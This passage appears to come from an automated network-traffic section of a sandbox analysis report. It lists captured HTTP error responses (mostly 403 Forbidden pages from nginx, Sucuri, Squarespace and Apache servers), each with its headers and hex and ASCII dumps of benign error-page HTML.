src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:56:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 8ad3681a-db4a-4430-9e30-fc648f9bdf33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZpGz%2FDR%2FC%2FKHgimrNVBZaCXtaWvEaafn4oJxmPz8v%2FgQtCVCC8FMccAjLSzSamRUVWFmAmIM5t3ELpu50mwc0%2BQWSERBvZVIK1ek0%2F182cp5IXwi5nKgdcXbD%2B5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.999950Server: cloudflareCF-RAY: 7a59a82b7ad22bf2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:17 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: S8iuBnIM/ET0dGn5ZData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:17 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:17 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: C6tiMbOD/QITHNV3mData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:18 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: 